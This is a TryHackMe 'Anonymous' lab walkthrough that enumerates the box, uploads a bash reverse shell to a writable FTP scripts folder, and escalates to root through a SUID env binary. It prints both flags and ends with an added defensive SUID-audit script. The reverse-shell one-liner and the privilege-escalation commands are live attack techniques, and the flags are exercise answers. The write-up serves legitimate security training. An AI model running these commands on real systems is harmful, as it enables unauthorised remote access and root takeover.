TryHackMe | Anonymous

0xNehru
May 29, 2021


Tryhackme — Anonymous

NMAP — Network mapper

#1 — Enumerate the machine. How many ports are open?

# nmap -sC -vv -A 10.10.138.102

Nmap scan:

ANSWER :- 4

#2 — What service is running on port 21?

ANSWER :- ftp

#3 — What service is running on ports 139 and 445?

ANSWER :- smb

#4 — There’s a share on the user’s computer. What’s it called?

#smbclient -L 10.10.138.102

ANSWER :- pics

#5 - user.txt

clean.sh

#!/bin/bash
bash -i >& /dev/tcp/10.8.192.14/4444 0>&1

Connect to the FTP server again:

ftp 10.10.37.186
Anonymous
cd scripts
put clean.sh

Now set up a netcat listener on the specified port:

# nc -nvlp 4444
listening on [any] 4444 …
connect to [10.8.192.14] from (UNKNOWN) [10.10.138.102] 54700
bash: cannot set terminal process group (1399): Inappropriate ioctl for device
bash: no job control in this shell
namelessone@anonymous:~$ ls
ls
pics
user.txt
namelessone@anonymous:~$ cat user.txt
cat user.txt

user flag — 90d6f992585815ff991e68748c414740

Privilege Escalation

I tried to check my privileges with sudo -l, but as I don’t have the user’s password, it failed. Let’s check which programs are owned by root and have the SUID bit set.

sudo -l doesn’t work so let’s check the SUID binaries. If you are unsure about finding and exploiting SUID binaries.

To get a list of all SUID binaries, execute the following command:

#find / -user root -perm -u=s 2>/dev/null

/usr/bin/passwd
/usr/bin/env   <-- here
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec

GTFOBins (https://gtfobins.github.io/gtfobins/env/) reveals a potential privilege escalation:

namelessone@anonymous:~$ env /bin/sh -p
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
4d930091c31a622a7ed10f27999af363

root flag — 4d930091c31a622a7ed10f27999af363
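
A defender's view of the SUID listing above, as an added example that is not part of the original write-up: the script compares a `find` listing against a baseline and flags `/usr/bin/env`, which should never carry the SUID bit. The baseline, the `NEVER_SUID` list, the `audit_suid` function name and the `/usr/local/bin/backup-helper` path are assumptions made for illustration.

```bash
#!/bin/sh
# Added example (not from the original write-up): audit a SUID-root listing.
# EXPECTED_SUID is an assumed baseline: the listing on this page minus
# /usr/bin/env. Build the real one from a known-good image of your distro.
EXPECTED_SUID='/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec'

# Programs whose whole job is to run another program must never be SUID.
# Only env is listed because it is the one this page demonstrates.
NEVER_SUID='env'

# audit_suid: read one path per line on stdin and print a finding for each
# path that is a known command runner (CRITICAL) or is absent from the
# baseline (REVIEW). Paths that match the baseline produce no output.
audit_suid() {
    while IFS= read -r suid_path || [ -n "$suid_path" ]; do
        [ -n "$suid_path" ] || continue   # skip blank lines
        if printf '%s\n' "$NEVER_SUID" | grep -Fxq -- "${suid_path##*/}"; then
            printf 'CRITICAL %s (fix: chmod u-s %s)\n' "$suid_path" "$suid_path"
        elif ! printf '%s\n' "$EXPECTED_SUID" | grep -Fxq -- "$suid_path"; then
            printf 'REVIEW %s (not in baseline)\n' "$suid_path"
        fi
    done
    return 0
}

# Constructed sample: part of the find output shown above plus one made-up path.
SAMPLE_LISTING='/usr/bin/passwd
/usr/bin/env
/usr/bin/sudo
/usr/local/bin/backup-helper
/usr/bin/pkexec'

printf '%s\n' "$SAMPLE_LISTING" | audit_suid
# Live use: find / -xdev -user root -perm -u=s -type f 2>/dev/null | audit_suid
```

Run on a schedule and alert on any output, since a new SUID-root binary on a server is rarely a legitimate change.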
